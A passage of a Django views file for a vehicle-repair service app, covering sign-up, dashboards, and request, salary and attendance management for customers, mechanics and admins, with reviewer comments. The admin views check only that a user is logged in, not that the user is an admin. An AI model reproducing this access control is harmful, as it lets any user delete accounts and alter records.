from django.contrib.auth.decorators import login_required,user_passes_test
from django.conf import settings
from django.db.models import Q
def home_view(request):
    """Landing page; authenticated users are sent to their dashboard."""
    if not request.user.is_authenticated:
        return render(request, 'vehicle/index.html')
    return HttpResponseRedirect('afterlogin')
#for showing signup/login button for customer
def customerclick_view(request):
    """Show customer signup/login choices (or skip if already logged in)."""
    if not request.user.is_authenticated:
        return render(request, 'vehicle/customerclick.html')
    return HttpResponseRedirect('afterlogin')
#for showing signup/login button for mechanics
def mechanicsclick_view(request):
    """Show mechanic signup/login choices (or skip if already logged in)."""
    if not request.user.is_authenticated:
        return render(request, 'vehicle/mechanicsclick.html')
    return HttpResponseRedirect('afterlogin')
#for showing signup/login button for ADMIN(by sumit)
def adminclick_view(request):
    """Route admins either to their post-login page or to the login form."""
    target = 'afterlogin' if request.user.is_authenticated else 'adminlogin'
    return HttpResponseRedirect(target)
def customer_signup_view(request):
    """Render and process the customer sign-up form.

    On a valid POST: creates the User (re-hashing the submitted password),
    the linked Customer profile, and adds the user to the CUSTOMER group.
    """
    userForm = forms.CustomerUserForm()
    customerForm = forms.CustomerForm()
    mydict = {'userForm': userForm, 'customerForm': customerForm}
    if request.method == 'POST':
        userForm = forms.CustomerUserForm(request.POST)
        customerForm = forms.CustomerForm(request.POST, request.FILES)
        if userForm.is_valid() and customerForm.is_valid():
            user = userForm.save()
            # BUGFIX: the set_password argument was a corrupted placeholder;
            # hash the raw password from the form so authentication works
            # (ModelForm.save would otherwise store it as plain text).
            user.set_password(user.password)
            user.save()
            customer = customerForm.save(commit=False)
            customer.user = user
            customer.save()
            my_customer_group = Group.objects.get_or_create(name='CUSTOMER')
            my_customer_group[0].user_set.add(user)
        return HttpResponseRedirect('customerlogin')
    return render(request, 'vehicle/customersignup.html', context=mydict)
def mechanic_signup_view(request):
    """Render and process the mechanic sign-up form.

    On a valid POST: creates the User (re-hashing the submitted password),
    the linked Mechanic profile, and adds the user to the MECHANIC group.
    """
    userForm = forms.MechanicUserForm()
    mechanicForm = forms.MechanicForm()
    mydict = {'userForm': userForm, 'mechanicForm': mechanicForm}
    if request.method == 'POST':
        userForm = forms.MechanicUserForm(request.POST)
        mechanicForm = forms.MechanicForm(request.POST, request.FILES)
        if userForm.is_valid() and mechanicForm.is_valid():
            user = userForm.save()
            # BUGFIX: the set_password argument was a corrupted placeholder;
            # hash the raw password from the form so authentication works.
            user.set_password(user.password)
            user.save()
            mechanic = mechanicForm.save(commit=False)
            mechanic.user = user
            mechanic.save()
            my_mechanic_group = Group.objects.get_or_create(name='MECHANIC')
            my_mechanic_group[0].user_set.add(user)
        return HttpResponseRedirect('mechaniclogin')
    return render(request, 'vehicle/mechanicsignup.html', context=mydict)
#for checking user customer, mechanic or admin(by sumit)
def is_customer(user):
    """Return True when `user` belongs to the CUSTOMER auth group."""
    return user.groups.filter(name='CUSTOMER').exists()
def is_mechanic(user):
    """Return True when `user` belongs to the MECHANIC auth group."""
    return user.groups.filter(name='MECHANIC').exists()
def afterlogin_view(request):
    """Dispatch a freshly logged-in user to the dashboard for their role.

    Mechanics are only admitted once an admin has approved their account
    (Mechanic.status is True); otherwise they see a waiting page.  Users
    in neither group are treated as admins.
    """
    if is_customer(request.user):
        return redirect('customer-dashboard')
    elif is_mechanic(request.user):
        accountapproval=models.Mechanic.objects.all().filter(user_id=request.user.id,status=True)
        if accountapproval:
            return redirect('mechanic-dashboard')
        else:
            return render(request,'vehicle/mechanic_wait_for_approval.html')
    else:
        return redirect('admin-dashboard')
#============================================================================================
# ADMIN RELATED views start
#============================================================================================
@login_required(login_url='adminlogin')
def admin_dashboard_view(request):
    """Admin landing page: overall counts plus the latest enquiries paired
    with the customers who raised them."""
    enquiry = models.Request.objects.all().order_by('-id')
    # NOTE(review): one query per enquiry (N+1 pattern); acceptable at this
    # scale, but select_related/bulk fetch would be cheaper.
    customers = [models.Customer.objects.get(id=enq.customer_id)
                 for enq in enquiry]
    # IMPROVEMENT: renamed the local from `dict`, which shadowed the builtin.
    context = {
        'total_customer': models.Customer.objects.all().count(),
        'total_mechanic': models.Mechanic.objects.all().count(),
        'total_request': models.Request.objects.all().count(),
        'total_feedback': models.Feedback.objects.all().count(),
        'data': zip(customers, enquiry),
    }
    return render(request, 'vehicle/admin_dashboard.html', context=context)
@login_required(login_url='adminlogin')
def admin_customer_view(request):
    """Admin 'customer' landing page (links to customer actions)."""
    return render(request,'vehicle/admin_customer.html')
@login_required(login_url='adminlogin')
def admin_view_customer_view(request):
    """Table of all customers."""
    customers=models.Customer.objects.all()
    return render(request,'vehicle/admin_view_customer.html',{'customers':customers})
@login_required(login_url='adminlogin')
def delete_customer_view(request,pk):
    """Delete customer ``pk`` together with its underlying auth User."""
    customer=models.Customer.objects.get(id=pk)
    user=models.User.objects.get(id=customer.user_id)
    user.delete()
    customer.delete()
    return redirect('admin-view-customer')
@login_required(login_url='adminlogin')
def update_customer_view(request,pk):
    """Admin edit of an existing customer: updates both the auth User and
    the Customer profile identified by ``pk``."""
    customer=models.Customer.objects.get(id=pk)
    user=models.User.objects.get(id=customer.user_id)
    userForm=forms.CustomerUserForm(instance=user)
    # Unbound form pre-filled from the instance. (Previously request.FILES
    # was passed as the *data* argument, which made the GET form bound to
    # an empty dict and rendered spurious validation errors.)
    customerForm=forms.CustomerForm(instance=customer)
    mydict={'userForm':userForm,'customerForm':customerForm}
    if request.method=='POST':
        userForm=forms.CustomerUserForm(request.POST,instance=user)
        customerForm=forms.CustomerForm(request.POST,request.FILES,instance=customer)
        if userForm.is_valid() and customerForm.is_valid():
            user=userForm.save()
            # Re-hash the plain-text password the ModelForm save stored.
            user.set_password(user.password)
            user.save()
            customerForm.save()
            return redirect('admin-view-customer')
    return render(request,'vehicle/update_customer.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_add_customer_view(request):
    """Admin creates a customer account: auth User + Customer profile,
    added to the CUSTOMER group."""
    userForm=forms.CustomerUserForm()
    customerForm=forms.CustomerForm()
    mydict={'userForm':userForm,'customerForm':customerForm}
    if request.method=='POST':
        userForm=forms.CustomerUserForm(request.POST)
        customerForm=forms.CustomerForm(request.POST,request.FILES)
        if userForm.is_valid() and customerForm.is_valid():
            user=userForm.save()
            # The ModelForm stored the raw password; hash it properly.
            user.set_password(user.password)
            user.save()
            customer=customerForm.save(commit=False)
            customer.user=user
            customer.save()
            my_customer_group = Group.objects.get_or_create(name='CUSTOMER')
            my_customer_group[0].user_set.add(user)
        return HttpResponseRedirect('/admin-view-customer')
    return render(request,'vehicle/admin_add_customer.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_view_customer_enquiry_view(request):
    """List every service request (newest first) next to the customer
    that raised it."""
    enquiry=models.Request.objects.all().order_by('-id')
    customers=[models.Customer.objects.get(id=enq.customer_id) for enq in enquiry]
    return render(request,'vehicle/admin_view_customer_enquiry.html',{'data':zip(customers,enquiry)})
@login_required(login_url='adminlogin')
def admin_view_customer_invoice_view(request):
    """Per-customer invoice totals: group requests by customer and sum
    their costs, pairing each aggregate row with its Customer.

    (Leftover debug ``print()`` calls removed.)
    """
    # Each row is a dict like {'customer_id': ..., 'cost__sum': ...}.
    enquiry=models.Request.objects.values('customer_id').annotate(Sum('cost'))
    customers=[models.Customer.objects.get(id=enq['customer_id']) for enq in enquiry]
    return render(request,'vehicle/admin_view_customer_invoice.html',{'data':zip(customers,enquiry)})
@login_required(login_url='adminlogin')
def admin_mechanic_view(request):
    """Admin 'mechanic' landing page."""
    return render(request,'vehicle/admin_mechanic.html')
@login_required(login_url='adminlogin')
def admin_approve_mechanic_view(request):
    """List mechanics still waiting for approval (status=False)."""
    mechanics=models.Mechanic.objects.all().filter(status=False)
    return render(request,'vehicle/admin_approve_mechanic.html',{'mechanics':mechanics})
@login_required(login_url='adminlogin')
def approve_mechanic_view(request,pk):
    """Approve mechanic ``pk``: record the salary and flip status to True."""
    mechanicSalary=forms.MechanicSalaryForm()
    if request.method=='POST':
        mechanicSalary=forms.MechanicSalaryForm(request.POST)
        if mechanicSalary.is_valid():
            mechanic=models.Mechanic.objects.get(id=pk)
            mechanic.salary=mechanicSalary.cleaned_data['salary']
            mechanic.status=True
            mechanic.save()
        else:
            print("form is invalid")
        return HttpResponseRedirect('/admin-approve-mechanic')
    return render(request,'vehicle/admin_approve_mechanic_details.html',{'mechanicSalary':mechanicSalary})
@login_required(login_url='adminlogin')
def delete_mechanic_view(request,pk):
    """Delete mechanic ``pk`` and its auth User, returning to the
    approval list.

    NOTE(review): a second ``delete_mechanic_view`` is defined later in
    this module and shadows this one at import time, so this version
    (and its 'admin-approve-mechanic' redirect) is unreachable via
    ``views.delete_mechanic_view`` — confirm which target is intended
    and drop one definition.
    """
    mechanic=models.Mechanic.objects.get(id=pk)
    user=models.User.objects.get(id=mechanic.user_id)
    user.delete()
    mechanic.delete()
    return redirect('admin-approve-mechanic')
@login_required(login_url='adminlogin')
def admin_add_mechanic_view(request):
    """Admin creates a mechanic account directly: auth User + Mechanic
    profile + salary, pre-approved (status=True) and added to the
    MECHANIC group."""
    userForm=forms.MechanicUserForm()
    mechanicForm=forms.MechanicForm()
    mechanicSalary=forms.MechanicSalaryForm()
    mydict={'userForm':userForm,'mechanicForm':mechanicForm,'mechanicSalary':mechanicSalary}
    if request.method=='POST':
        userForm=forms.MechanicUserForm(request.POST)
        mechanicForm=forms.MechanicForm(request.POST,request.FILES)
        mechanicSalary=forms.MechanicSalaryForm(request.POST)
        if userForm.is_valid() and mechanicForm.is_valid() and mechanicSalary.is_valid():
            user=userForm.save()
            # Hash the plain-text password the ModelForm stored.
            user.set_password(user.password)
            user.save()
            mechanic=mechanicForm.save(commit=False)
            mechanic.user=user
            mechanic.status=True
            mechanic.salary=mechanicSalary.cleaned_data['salary']
            mechanic.save()
            my_mechanic_group = Group.objects.get_or_create(name='MECHANIC')
            my_mechanic_group[0].user_set.add(user)
            # Absolute path, consistent with the other admin redirects in
            # this module; the previous relative 'admin-view-mechanic'
            # resolved against the current URL and could yield a wrong path.
            return HttpResponseRedirect('/admin-view-mechanic')
        else:
            print('problem in form')
    return render(request,'vehicle/admin_add_mechanic.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_view_mechanic_view(request):
    """Table of all mechanics."""
    mechanics=models.Mechanic.objects.all()
    return render(request,'vehicle/admin_view_mechanic.html',{'mechanics':mechanics})
@login_required(login_url='adminlogin')
def delete_mechanic_view(request,pk):
    """Delete mechanic ``pk`` and its auth User.

    NOTE(review): this redefinition shadows the earlier
    ``delete_mechanic_view`` (which redirected to
    'admin-approve-mechanic'); only this version is reachable.
    """
    mechanic=models.Mechanic.objects.get(id=pk)
    user=models.User.objects.get(id=mechanic.user_id)
    user.delete()
    mechanic.delete()
    return redirect('admin-view-mechanic')
@login_required(login_url='adminlogin')
def update_mechanic_view(request,pk):
    """Admin edit of an existing mechanic: updates both the auth User and
    the Mechanic profile identified by ``pk``."""
    mechanic=models.Mechanic.objects.get(id=pk)
    user=models.User.objects.get(id=mechanic.user_id)
    userForm=forms.MechanicUserForm(instance=user)
    # Unbound form pre-filled from the instance. (Previously request.FILES
    # was passed as the *data* argument, which made the GET form bound to
    # an empty dict and rendered spurious validation errors.)
    mechanicForm=forms.MechanicForm(instance=mechanic)
    mydict={'userForm':userForm,'mechanicForm':mechanicForm}
    if request.method=='POST':
        userForm=forms.MechanicUserForm(request.POST,instance=user)
        mechanicForm=forms.MechanicForm(request.POST,request.FILES,instance=mechanic)
        if userForm.is_valid() and mechanicForm.is_valid():
            user=userForm.save()
            # Re-hash the plain-text password the ModelForm save stored.
            user.set_password(user.password)
            user.save()
            mechanicForm.save()
            return redirect('admin-view-mechanic')
    return render(request,'vehicle/update_mechanic.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_view_mechanic_salary_view(request):
    """Table of all mechanics with their salaries."""
    mechanics=models.Mechanic.objects.all()
    return render(request,'vehicle/admin_view_mechanic_salary.html',{'mechanics':mechanics})
@login_required(login_url='adminlogin')
def update_salary_view(request,pk):
    """Update the salary of mechanic ``pk``."""
    mechanicSalary=forms.MechanicSalaryForm()
    if request.method=='POST':
        mechanicSalary=forms.MechanicSalaryForm(request.POST)
        if mechanicSalary.is_valid():
            mechanic=models.Mechanic.objects.get(id=pk)
            mechanic.salary=mechanicSalary.cleaned_data['salary']
            mechanic.save()
        else:
            print("form is invalid")
        return HttpResponseRedirect('/admin-view-mechanic-salary')
    # Reuses the approval-details template for the salary form.
    return render(request,'vehicle/admin_approve_mechanic_details.html',{'mechanicSalary':mechanicSalary})
@login_required(login_url='adminlogin')
def admin_request_view(request):
    """Admin 'request' landing page."""
    return render(request,'vehicle/admin_request.html')
@login_required(login_url='adminlogin')
def admin_view_request_view(request):
    """All service requests (newest first), each paired with its customer."""
    enquiry=models.Request.objects.all().order_by('-id')
    customers=[]
    for enq in enquiry:
        customer=models.Customer.objects.get(id=enq.customer_id)
        customers.append(customer)
    return render(request,'vehicle/admin_view_request.html',{'data':zip(customers,enquiry)})
@login_required(login_url='adminlogin')
def change_status_view(request,pk):
    """Admin updates mechanic, cost and status of request ``pk``.

    NOTE(review): identical logic to ``approve_request_view`` below except
    for the redirect target — candidates for sharing one helper.
    """
    adminenquiry=forms.AdminApproveRequestForm()
    if request.method=='POST':
        adminenquiry=forms.AdminApproveRequestForm(request.POST)
        if adminenquiry.is_valid():
            enquiry_x=models.Request.objects.get(id=pk)
            enquiry_x.mechanic=adminenquiry.cleaned_data['mechanic']
            enquiry_x.cost=adminenquiry.cleaned_data['cost']
            enquiry_x.status=adminenquiry.cleaned_data['status']
            enquiry_x.save()
        else:
            print("form is invalid")
        return HttpResponseRedirect('/admin-view-request')
    return render(request,'vehicle/admin_approve_request_details.html',{'adminenquiry':adminenquiry})
@login_required(login_url='adminlogin')
def admin_delete_request_view(request,pk):
    """Delete the service request with primary key ``pk``."""
    requests=models.Request.objects.get(id=pk)
    requests.delete()
    return redirect('admin-view-request')
@login_required(login_url='adminlogin')
def admin_add_request_view(request):
    """Admin records a service request on behalf of a customer; the new
    Request is created already 'Approved' with mechanic and cost set."""
    enquiry=forms.RequestForm()
    adminenquiry=forms.AdminRequestForm()
    mydict={'enquiry':enquiry,'adminenquiry':adminenquiry}
    if request.method=='POST':
        enquiry=forms.RequestForm(request.POST)
        adminenquiry=forms.AdminRequestForm(request.POST)
        if enquiry.is_valid() and adminenquiry.is_valid():
            enquiry_x=enquiry.save(commit=False)
            enquiry_x.customer=adminenquiry.cleaned_data['customer']
            enquiry_x.mechanic=adminenquiry.cleaned_data['mechanic']
            enquiry_x.cost=adminenquiry.cleaned_data['cost']
            enquiry_x.status='Approved'
            enquiry_x.save()
        else:
            print("form is invalid")
        # Absolute path, matching change_status_view's '/admin-view-request';
        # the previous relative 'admin-view-request' resolved against the
        # current URL and could redirect to a wrong path.
        return HttpResponseRedirect('/admin-view-request')
    return render(request,'vehicle/admin_add_request.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_approve_request_view(request):
    """List service requests still waiting for approval ('Pending')."""
    enquiry=models.Request.objects.all().filter(status='Pending')
    return render(request,'vehicle/admin_approve_request.html',{'enquiry':enquiry})
@login_required(login_url='adminlogin')
def approve_request_view(request,pk):
    """Approve request ``pk``: assign mechanic, cost and status."""
    adminenquiry=forms.AdminApproveRequestForm()
    if request.method=='POST':
        adminenquiry=forms.AdminApproveRequestForm(request.POST)
        if adminenquiry.is_valid():
            enquiry_x=models.Request.objects.get(id=pk)
            enquiry_x.mechanic=adminenquiry.cleaned_data['mechanic']
            enquiry_x.cost=adminenquiry.cleaned_data['cost']
            enquiry_x.status=adminenquiry.cleaned_data['status']
            enquiry_x.save()
        else:
            print("form is invalid")
        return HttpResponseRedirect('/admin-approve-request')
    return render(request,'vehicle/admin_approve_request_details.html',{'adminenquiry':adminenquiry})
@login_required(login_url='adminlogin')
def admin_view_service_cost_view(request):
    """List every request (newest first) with its customer so the admin
    can review and update service costs.

    (Leftover debug ``print(customers)`` removed.)
    """
    enquiry=models.Request.objects.all().order_by('-id')
    customers=[models.Customer.objects.get(id=enq.customer_id) for enq in enquiry]
    return render(request,'vehicle/admin_view_service_cost.html',{'data':zip(customers,enquiry)})
@login_required(login_url='adminlogin')
def update_cost_view(request,pk):
    """Update the cost of request ``pk``."""
    updateCostForm=forms.UpdateCostForm()
    if request.method=='POST':
        updateCostForm=forms.UpdateCostForm(request.POST)
        if updateCostForm.is_valid():
            enquiry_x=models.Request.objects.get(id=pk)
            enquiry_x.cost=updateCostForm.cleaned_data['cost']
            enquiry_x.save()
        else:
            print("form is invalid")
        return HttpResponseRedirect('/admin-view-service-cost')
    return render(request,'vehicle/update_cost.html',{'updateCostForm':updateCostForm})
@login_required(login_url='adminlogin')
def admin_mechanic_attendance_view(request):
    """Attendance landing page for the admin."""
    return render(request,'vehicle/admin_mechanic_attendance.html')
@login_required(login_url='adminlogin')
def admin_take_attendance_view(request):
    """Record attendance for every approved mechanic on a chosen date.

    NOTE(review): the i-th checkbox in ``present_status`` is assumed to
    line up with the i-th row of ``mechanics`` — i.e. the template must
    render the checkboxes in queryset order. Confirm against the template.
    """
    mechanics=models.Mechanic.objects.all().filter(status=True)
    aform=forms.AttendanceForm()
    if request.method=='POST':
        form=forms.AttendanceForm(request.POST)
        if form.is_valid():
            Attendances=request.POST.getlist('present_status')
            date=form.cleaned_data['date']
            for i in range(len(Attendances)):
                AttendanceModel=models.Attendance()
                AttendanceModel.date=date
                AttendanceModel.present_status=Attendances[i]
                # mechanics[i] is already the Mechanic row; no need to
                # re-fetch it by id (debug prints removed too).
                AttendanceModel.mechanic=mechanics[i]
                AttendanceModel.save()
            return redirect('admin-view-attendance')
        else:
            print('form invalid')
    return render(request,'vehicle/admin_take_attendance.html',{'mechanics':mechanics,'aform':aform})
@login_required(login_url='adminlogin')
def admin_view_attendance_view(request):
    """Ask for a date, then show each approved mechanic's attendance on it.

    NOTE(review): ``zip(attendancedata, mechanicdata)`` assumes the two
    querysets have the same length and matching order — confirm this still
    holds when mechanics were added after attendance was taken.
    """
    form=forms.AskDateForm()
    if request.method=='POST':
        form=forms.AskDateForm(request.POST)
        if form.is_valid():
            date=form.cleaned_data['date']
            attendancedata=models.Attendance.objects.all().filter(date=date)
            mechanicdata=models.Mechanic.objects.all().filter(status=True)
            mylist=zip(attendancedata,mechanicdata)
            return render(request,'vehicle/admin_view_attendance_page.html',{'mylist':mylist,'date':date})
        else:
            print('form invalid')
    return render(request,'vehicle/admin_view_attendance_ask_date.html',{'form':form})
@login_required(login_url='adminlogin')
def admin_report_view(request):
    """Report of all finished work ('Repairing Done' or 'Released')."""
    reports=models.Request.objects.all().filter(Q(status="Repairing Done") | Q(status="Released"))
    # NOTE: local name shadows the builtin ``dict``.
    dict={
        'reports':reports,
    }
    return render(request,'vehicle/admin_report.html',context=dict)
@login_required(login_url='adminlogin')
def admin_feedback_view(request):
    """All feedback entries, newest first."""
    feedback=models.Feedback.objects.all().order_by('-id')
    return render(request,'vehicle/admin_feedback.html',{'feedback':feedback})
#============================================================================================
# ADMIN RELATED views END
#============================================================================================
#============================================================================================
# CUSTOMER RELATED views start
#============================================================================================
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_dashboard_view(request):
    """Customer landing page: counts of in-progress / completed / new
    requests plus the customer's total bill for finished work."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    work_in_progress=models.Request.objects.all().filter(customer_id=customer.id,status='Repairing').count()
    work_completed=models.Request.objects.all().filter(customer_id=customer.id).filter(Q(status="Repairing Done") | Q(status="Released")).count()
    new_request_made=models.Request.objects.all().filter(customer_id=customer.id).filter(Q(status="Pending") | Q(status="Approved")).count()
    bill=models.Request.objects.all().filter(customer_id=customer.id).filter(Q(status="Repairing Done") | Q(status="Released")).aggregate(Sum('cost'))
    # Renamed from ``dict`` to avoid shadowing the builtin; debug print removed.
    context={
        'work_in_progress':work_in_progress,
        'work_completed':work_completed,
        'new_request_made':new_request_made,
        # aggregate() yields None when there are no billable requests;
        # show 0 instead of rendering "None" in the template.
        'bill':bill['cost__sum'] or 0,
        'customer':customer,
    }
    return render(request,'vehicle/customer_dashboard.html',context=context)
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_request_view(request):
    """Customer 'request' landing page."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    return render(request,'vehicle/customer_request.html',{'customer':customer})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_view_request_view(request):
    """List this customer's still-pending service requests."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    enquiries=models.Request.objects.all().filter(customer_id=customer.id , status="Pending")
    return render(request,'vehicle/customer_view_request.html',{'customer':customer,'enquiries':enquiries})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_delete_request_view(request,pk):
    """Delete one of *this* customer's requests.

    Security fix: the request is looked up by (id, customer), so a
    logged-in customer can no longer delete another customer's request
    by guessing ``pk``.
    """
    customer=models.Customer.objects.get(user_id=request.user.id)
    enquiry=models.Request.objects.get(id=pk,customer_id=customer.id)
    enquiry.delete()
    return redirect('customer-view-request')
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_view_approved_request_view(request):
    """Requests of this customer that are no longer pending."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    enquiries=models.Request.objects.all().filter(customer_id=customer.id).exclude(status='Pending')
    return render(request,'vehicle/customer_view_approved_request.html',{'customer':customer,'enquiries':enquiries})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_view_approved_request_invoice_view(request):
    """Invoice view of this customer's non-pending requests."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    enquiries=models.Request.objects.all().filter(customer_id=customer.id).exclude(status='Pending')
    return render(request,'vehicle/customer_view_approved_request_invoice.html',{'customer':customer,'enquiries':enquiries})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_add_request_view(request):
    """Let the logged-in customer submit a new service request; the new
    Request is attached to their Customer profile."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    enquiry=forms.RequestForm()
    if request.method=='POST':
        enquiry=forms.RequestForm(request.POST)
        if enquiry.is_valid():
            # Reuse the Customer fetched above instead of querying again.
            enquiry_x=enquiry.save(commit=False)
            enquiry_x.customer=customer
            enquiry_x.save()
        else:
            print("form is invalid")
        return HttpResponseRedirect('customer-dashboard')
    return render(request,'vehicle/customer_add_request.html',{'enquiry':enquiry,'customer':customer})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_profile_view(request):
    """Show the logged-in customer's profile."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    return render(request,'vehicle/customer_profile.html',{'customer':customer})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def edit_customer_profile_view(request):
    """Customer edits their own account (auth User + Customer profile)."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    user=models.User.objects.get(id=customer.user_id)
    userForm=forms.CustomerUserForm(instance=user)
    # Unbound form pre-filled from the instance. (Previously request.FILES
    # was passed as the *data* argument, leaving the GET form bound to an
    # empty dict with spurious validation errors.)
    customerForm=forms.CustomerForm(instance=customer)
    mydict={'userForm':userForm,'customerForm':customerForm,'customer':customer}
    if request.method=='POST':
        userForm=forms.CustomerUserForm(request.POST,instance=user)
        # request.FILES must be passed on POST, otherwise an uploaded
        # profile picture is silently dropped (matches the other
        # profile-edit views in this module).
        customerForm=forms.CustomerForm(request.POST,request.FILES,instance=customer)
        if userForm.is_valid() and customerForm.is_valid():
            user=userForm.save()
            # Re-hash the plain-text password the ModelForm save stored.
            user.set_password(user.password)
            user.save()
            customerForm.save()
            return HttpResponseRedirect('customer-profile')
    return render(request,'vehicle/edit_customer_profile.html',context=mydict)
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_invoice_view(request):
    """Invoices for all of this customer's non-pending requests."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    enquiries=models.Request.objects.all().filter(customer_id=customer.id).exclude(status='Pending')
    return render(request,'vehicle/customer_invoice.html',{'customer':customer,'enquiries':enquiries})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_feedback_view(request):
    """Let the customer submit feedback; show a confirmation on success."""
    customer=models.Customer.objects.get(user_id=request.user.id)
    feedback=forms.FeedbackForm()
    if request.method=='POST':
        feedback=forms.FeedbackForm(request.POST)
        if feedback.is_valid():
            feedback.save()
        else:
            print("form is invalid")
        return render(request,'vehicle/feedback_sent_by_customer.html',{'customer':customer})
    return render(request,'vehicle/customer_feedback.html',{'feedback':feedback,'customer':customer})
#============================================================================================
# CUSTOMER RELATED views END
#============================================================================================
#============================================================================================
# MECHANIC RELATED views start
#============================================================================================
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_dashboard_view(request):
    """Mechanic landing page: counts of assigned work and the salary."""
    mechanic=models.Mechanic.objects.get(user_id=request.user.id)
    work_in_progress=models.Request.objects.all().filter(mechanic_id=mechanic.id,status='Repairing').count()
    work_completed=models.Request.objects.all().filter(mechanic_id=mechanic.id,status='Repairing Done').count()
    new_work_assigned=models.Request.objects.all().filter(mechanic_id=mechanic.id,status='Approved').count()
    # NOTE: local name shadows the builtin ``dict``.
    dict={
        'work_in_progress':work_in_progress,
        'work_completed':work_completed,
        'new_work_assigned':new_work_assigned,
        'salary':mechanic.salary,
        'mechanic':mechanic,
    }
    return render(request,'vehicle/mechanic_dashboard.html',context=dict)
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_work_assigned_view(request):
    """All requests assigned to the logged-in mechanic."""
    mechanic=models.Mechanic.objects.get(user_id=request.user.id)
    works=models.Request.objects.all().filter(mechanic_id=mechanic.id)
    return render(request,'vehicle/mechanic_work_assigned.html',{'works':works,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_update_status_view(request,pk):
    """Mechanic updates the status of request ``pk``.

    NOTE(review): the request is fetched by id only — nothing checks that
    it is actually assigned to this mechanic; confirm whether any mechanic
    is meant to be able to change any request's status.
    """
    mechanic=models.Mechanic.objects.get(user_id=request.user.id)
    updateStatus=forms.MechanicUpdateStatusForm()
    if request.method=='POST':
        updateStatus=forms.MechanicUpdateStatusForm(request.POST)
        if updateStatus.is_valid():
            enquiry_x=models.Request.objects.get(id=pk)
            enquiry_x.status=updateStatus.cleaned_data['status']
            enquiry_x.save()
        else:
            print("form is invalid")
        return HttpResponseRedirect('/mechanic-work-assigned')
    return render(request,'vehicle/mechanic_update_status.html',{'updateStatus':updateStatus,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_attendance_view(request):
    """Attendance history of the logged-in mechanic."""
    mechanic=models.Mechanic.objects.get(user_id=request.user.id)
    # 'attendaces' (sic) is also the context key the template expects, so
    # the typo cannot be fixed here without touching the template.
    attendaces=models.Attendance.objects.all().filter(mechanic=mechanic)
    return render(request,'vehicle/mechanic_view_attendance.html',{'attendaces':attendaces,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_feedback_view(request):
    """Let the mechanic submit feedback; show a confirmation on success."""
    mechanic=models.Mechanic.objects.get(user_id=request.user.id)
    feedback=forms.FeedbackForm()
    if request.method=='POST':
        feedback=forms.FeedbackForm(request.POST)
        if feedback.is_valid():
            feedback.save()
        else:
            print("form is invalid")
        return render(request,'vehicle/feedback_sent.html',{'mechanic':mechanic})
    return render(request,'vehicle/mechanic_feedback.html',{'feedback':feedback,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_salary_view(request):
    """Finished work ('Repairing Done'/'Released') for the mechanic's
    salary page."""
    mechanic=models.Mechanic.objects.get(user_id=request.user.id)
    workdone=models.Request.objects.all().filter(mechanic_id=mechanic.id).filter(Q(status="Repairing Done") | Q(status="Released"))
    return render(request,'vehicle/mechanic_salary.html',{'workdone':workdone,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_profile_view(request):
    """Show the logged-in mechanic's profile."""
    mechanic=models.Mechanic.objects.get(user_id=request.user.id)
    return render(request,'vehicle/mechanic_profile.html',{'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def edit_mechanic_profile_view(request):
    """Mechanic edits their own account (auth User + Mechanic profile)."""
    mechanic=models.Mechanic.objects.get(user_id=request.user.id)
    user=models.User.objects.get(id=mechanic.user_id)
    userForm=forms.MechanicUserForm(instance=user)
    # Unbound form pre-filled from the instance. (Previously request.FILES
    # was passed as the *data* argument, leaving the GET form bound to an
    # empty dict with spurious validation errors.)
    mechanicForm=forms.MechanicForm(instance=mechanic)
    mydict={'userForm':userForm,'mechanicForm':mechanicForm,'mechanic':mechanic}
    if request.method=='POST':
        userForm=forms.MechanicUserForm(request.POST,instance=user)
        mechanicForm=forms.MechanicForm(request.POST,request.FILES,instance=mechanic)
        if userForm.is_valid() and mechanicForm.is_valid():
            user=userForm.save()
            # Re-hash the plain-text password the ModelForm save stored.
            user.set_password(user.password)
            user.save()
            mechanicForm.save()
            return redirect('mechanic-profile')
    return render(request,'vehicle/edit_mechanic_profile.html',context=mydict)
#============================================================================================
# MECHANIC RELATED views start
#============================================================================================
# Public pages: about-us and contact-us.
def aboutus_view(request):
    """Static about-us page."""
    return render(request,'vehicle/aboutus.html')
def contactus_view(request):
    """Contact form; on a valid POST, e-mail the message to the site
    owners (from settings) and show a success page."""
    sub = forms.ContactusForm()
    if request.method == 'POST':
        sub = forms.ContactusForm(request.POST)
        if sub.is_valid():
            email = sub.cleaned_data['Email']
            name=sub.cleaned_data['Name']
            message = sub.cleaned_data['Message']
